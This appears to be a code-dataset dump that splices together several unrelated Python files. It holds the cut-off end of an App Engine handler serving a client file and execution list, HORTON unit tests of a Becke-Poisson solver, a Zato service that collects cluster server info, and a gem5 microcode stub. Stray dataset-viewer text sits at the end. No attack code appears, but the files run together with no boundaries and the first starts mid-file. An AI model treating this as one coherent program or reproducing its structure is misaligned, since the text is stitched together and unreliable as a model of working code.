    to_execute = ['browser_install_bundle.zip', 'bots_client_bundle.zip']
    self.response.out.write(simplejson.dumps(
        {'file_list': downloads, 'execution_list': to_execute}))
# WSGI application routing the file-list URL to its handler.
application = webapp.WSGIApplication(
    [(CLIENT_FILE_LIST, ClientFileList)],
    debug=True)
def main():
  """Entry point: serve the WSGI application under App Engine."""
  run_wsgi_app(application)


if __name__ == '__main__':
  main()
# -*- coding: utf-8 -*-
# HORTON: Helpful Open-source Research TOol for N-fermion systems.
# Copyright (C) 2011-2017 The HORTON Development Team
#
# This file is part of HORTON.
#
# HORTON is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 3
# of the License, or (at your option) any later version.
#
# HORTON is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>
#
# --
from scipy.special import erf
import numpy as np
from nose.plugins.attrib import attr
from horton import * # pylint: disable=wildcard-import,unused-wildcard-import
@attr('slow')
def test_solve_poisson_becke_n2():
    """Compare the Becke-Poisson Hartree potential of N2 with the analytic one.

    The spherically decomposed potential must converge monotonically towards
    the reference as the maximum angular momentum (lmax) increases, and the
    final error must be small in absolute terms.
    """
    mol = IOData.from_file(context.get_fn('test/n2_hfs_sto3g.fchk'))
    lmaxmax = 4
    # compute hartree potential on a molecular grid
    molgrid = BeckeMolGrid(mol.coordinates, mol.numbers, mol.pseudo_numbers, random_rotate=False, mode='keep')
    dm_full = mol.get_dm_full()
    reference = mol.obasis.compute_grid_hartree_dm(dm_full, molgrid.points)
    # construct the same potential numerically with Becke's method
    rho = mol.obasis.compute_grid_density_dm(dm_full, molgrid.points)
    begin = 0
    hds = []  # per-atom spherical decompositions of the Hartree potential
    for i in xrange(mol.natom):
        atgrid = molgrid.subgrids[i]
        end = begin + atgrid.size
        becke_weights = molgrid.becke_weights[begin:end]
        density_decomposition = atgrid.get_spherical_decomposition(rho[begin:end], becke_weights, lmax=lmaxmax)
        hartree_decomposition = solve_poisson_becke(density_decomposition)
        hds.append(hartree_decomposition)
        begin = end
    # Evaluate the splines obtained with Becke's method on the molecular grid
    # Increasing angular momenta are used to check the convergence.
    last_error = None
    for lmax in xrange(0, lmaxmax+1):
        result = molgrid.zeros()
        for i in xrange(mol.natom):
            # (lmax+1)**2 is the number of spherical harmonics up to lmax.
            molgrid.eval_decomposition(hds[i][:(lmax+1)**2], mol.coordinates[i], result)
        potential_error = result - reference
        error = molgrid.integrate(potential_error, potential_error)**0.5
        if last_error is not None:
            # Including more angular momenta must reduce the L2 error.
            assert error < last_error
        last_error = error
        if False:
            # Debugging aid (never executed): break the error down per density range.
            worst = molgrid.integrate(reference, reference)**0.5
            print 'lmax=%i %12.4e %12.4e' % (lmax, error, worst)
            for rho_low, rho_high in (0, 1e-8), (1e-8, 1e-4), (1e-4, 1e0), (1e0, 1e4), (1e4, 1e100):
                mask = ((rho >= rho_low) & (rho < rho_high)).astype(float)
                error = molgrid.integrate(potential_error, potential_error, mask)**0.5
                worst = molgrid.integrate(reference, reference, mask)**0.5
                print '%10.2e : %10.2e | %12.4e %12.4e' % (rho_low, rho_high, error, worst)
            print
    # Final error (at lmax == lmaxmax) must also be small in absolute terms.
    assert error < 6e-2
    if False:
        # Plot stuff (debugging aid, never executed)
        import matplotlib.pyplot as pt
        linegrid = LineGrid(mol.coordinates[0], mol.coordinates[1], 500, 1)
        rho = mol.obasis.compute_grid_density_dm(dm_full, linegrid.points)
        reference = mol.obasis.compute_grid_hartree_dm(dm_full, linegrid.points)
        for lmax in xrange(0, lmaxmax+1):
            result = linegrid.zeros()
            for i in xrange(mol.natom):
                linegrid.eval_decomposition(hds[i][:(lmax+1)**2], mol.coordinates[i], result)
            pt.clf()
            #pt.plot(linegrid.x, reference)
            #pt.plot(linegrid.x, result)
            pt.plot(linegrid.x, (result - reference))
            pt.ylim(-0.3, 0.3)
            pt.savefig('test_poisson_%i.png' % lmax)
def test_solve_poisson_becke_sa():
    """Poisson solver on a spherically symmetric Gaussian charge density.

    The numerical potential and its radial derivative must match the analytic
    result erf(r/(sqrt(2)*sigma))/r to tight relative tolerances.
    """
    sigma = 8.0
    rtf = ExpRTransform(1e-4, 1e2, 500)
    r = rtf.get_radii()
    # Normalized Gaussian density and its radial derivative.
    rhoy = np.exp(-0.5*(r/sigma)**2)/sigma**3/(2*np.pi)**1.5
    rhod = np.exp(-0.5*(r/sigma)**2)/sigma**3/(2*np.pi)**1.5*(-r/sigma)/sigma
    rho = CubicSpline(rhoy, rhod, rtf)
    # Only the l=0 component is relevant for a spherical density.
    v = solve_poisson_becke([rho])[0]
    s2s = np.sqrt(2)*sigma
    # Analytic potential of a Gaussian charge and its derivative.
    soly = erf(r/s2s)/r
    sold = np.exp(-(r/s2s)**2)*2/np.sqrt(np.pi)/s2s/r - erf(r/s2s)/r**2
    if False:
        # Debugging aid, never executed.
        import matplotlib.pyplot as pt
        n = 10
        pt.clf()
        pt.plot(r[:n], soly[:n], label='exact')
        pt.plot(r[:n], v.y[:n], label='spline')
        pt.legend(loc=0)
        pt.savefig('denu.png')
    assert abs(v.y - soly).max()/abs(soly).max() < 1e-6
    assert abs(v.dx - sold).max()/abs(sold).max() < 1e-4
    # Test the boundary condition at zero and infinity
    assert v.extrapolation.l == 0
    np.testing.assert_allclose(v.extrapolation.amp_left, np.sqrt(2/np.pi)/sigma)
    np.testing.assert_allclose(v.extrapolation.amp_right, 1.0)
def test_solve_poisson_becke_gaussian_dipole():
    """Poisson solver on the l=1 (dipole) component of a Gaussian density.

    Checks the numerical l=1 potential, its derivative, and the asymptotic
    extrapolation amplitudes against the analytic expressions.
    """
    sigma = 8.0
    rtf = ExpRTransform(1e-4, 8e1, 200)
    r = rtf.get_radii()
    # By deriving a Gaussian charge distribution with respect to z, we get
    # rho(\mathbf{r})=Y_1^0(\Omega) rhoy, with rhoy as given below
    # Note that rhoy is simply the derivative of a Gaussian charge distribution
    # with respect to r.
    rhoy = -r/sigma**2*np.exp(-0.5*(r/sigma)**2)/sigma**3/(2*np.pi)**1.5
    rhod = (-1.0+r**2/sigma**2)/sigma**2*np.exp(-0.5*(r/sigma)**2)/sigma**3/(2*np.pi)**1.5
    rho = CubicSpline(rhoy, rhod, rtf)
    v = solve_poisson_becke([rho]*4)[1]  # Not interested in first spline, i.e. l=0
    s2s = np.sqrt(2)*sigma
    # The potential corresponding to Y_1^0(\Omega), can be found by deriving
    # the potential of a Gaussian charge distribution with respect to r
    soly = np.exp(-(r/s2s)**2)*2/np.sqrt(np.pi)/s2s/r - erf(r/s2s)/r**2
    sold = 2.0*erf(r/s2s)/r**3 - 2*2/np.sqrt(np.pi)*np.exp(-(r/s2s)**2)/s2s/r**2 - 2*2/np.sqrt(np.pi)/s2s**3*np.exp(-(r/s2s)**2)
    if False:
        # Debugging aid, never executed.
        import matplotlib.pyplot as pt
        n = 200
        pt.clf()
        pt.plot(r[:n], -soly[:n], label='exact', marker='*')
        pt.plot(r[:n], -v.y[:n], label='spline', marker='*')
        r2 = np.linspace(1e-5, 2e-4, 50)
        pt.plot(r2, -v(r2), label='spline eval', marker='*')
        pt.xscale('log')
        pt.yscale('log')
        pt.legend(loc=0)
        pt.savefig('poisson_gdipole.png')
    assert abs(v.y - soly).max()/abs(soly).max() < 1e-6
    assert abs(v.dx - sold).max()/abs(sold).max() < 1e-4
    # Test the boundary condition at zero and infinity
    assert v.extrapolation.l == 1
    np.testing.assert_allclose(v.extrapolation.amp_left, -2.0/3.0/np.sqrt(2*np.pi)/sigma**3)
    np.testing.assert_allclose(v.extrapolation.amp_right, -1.0)
# -*- coding: utf-8 -*-
"""
Copyright (C) 2014 Dariusz Suchojad <dsuch at zato.io>
Licensed under LGPLv3, see LICENSE.txt for terms and conditions.
"""
from __future__ import absolute_import, division, print_function, unicode_literals
# stdlib
from contextlib import closing
from json import dumps, loads
# Zato
from zato.client import AnyServiceInvoker
from zato.common import INFO_FORMAT, SERVER_JOIN_STATUS, SERVER_UP_STATUS
from zato.common.odb.query import server_list
from zato.common.component_info import format_info, get_info
from zato.server.service import Service
# ################################################################################################################################
class GetInfo(Service):
    """ Like 'zato info' on command line but works across the whole cluster rather than with a single server.
    """
    def handle(self):
        # Let's prepare as much as we can upfront.
        # Credentials and channel used to invoke the admin service on each server.
        sec_def = self.worker_store.basic_auth_get('admin.invoke').config
        channel = self.worker_store.get_channel_plain_http('admin.invoke.json')

        # Maps server name -> collected information about that server.
        out = {}

        with closing(self.odb.session()) as session:
            for item in server_list(session, self.server.cluster_id, False):
                server_info = out.setdefault(item.name, {})
                server_info['cluster_name'] = item.cluster_name
                # Timestamps are reported only when the corresponding status applies.
                server_info['up_mod_date'] = item.up_mod_date.isoformat() if item.up_status == SERVER_UP_STATUS.RUNNING else None
                server_info['last_join_mod_date'] = item.last_join_mod_date.isoformat() if \
                    item.last_join_status == SERVER_JOIN_STATUS.ACCEPTED else None
                for name in 'id', 'name', 'bind_host', 'bind_port', 'last_join_status', 'last_join_mod_by', 'up_status':
                    server_info[name] = getattr(item, name)

                # Only running servers can be queried over HTTP for their details.
                if item.up_status == SERVER_UP_STATUS.RUNNING:
                    client = AnyServiceInvoker(
                        'http://{}:{}'.format(item.bind_host, item.bind_port),
                        channel.url_path, (sec_def.username, sec_def.password))
                    response = client.invoke('zato.info.get-server-info')
                    if response.ok:
                        # The payload is base64-encoded JSON inside the invoker's envelope.
                        response = loads(response.inner.text)['zato_service_invoke_response']['response'].decode('base64')
                        response = loads(response)['response']
                        server_info['info'] = loads(response['info'])
                    else:
                        # Best-effort: a failed per-server call is logged, not fatal.
                        self.logger.warn(response)

        self.response.content_type = 'application/json'
        self.response.payload = dumps(out)
class GetServerInfo(Service):
    """ Collects information about a server it's invoked on.
    """
    class SimpleIO(object):
        # Single output element carrying the JSON-formatted server details.
        output_required = ('info',)

    def handle(self):
        # Gather local component info and return it as a JSON string.
        self.response.content_type = 'application/json'
        self.response.payload.info = format_info(get_info(self.server.base_dir, INFO_FORMAT.JSON), INFO_FORMAT.JSON)
# Copyright (c) 2007 The Hewlett-Packard Development Company
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Gabe Black
microcode = ""
#let {{
# class MOVMSKPS(Inst):
# "GenFault ${new UnimpInstFault}"
# class MOVMSKPD(Inst):
# "GenFault ${new UnimpInstFault}"
#}}; | unknown | codeparrot/codeparrot-clean |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.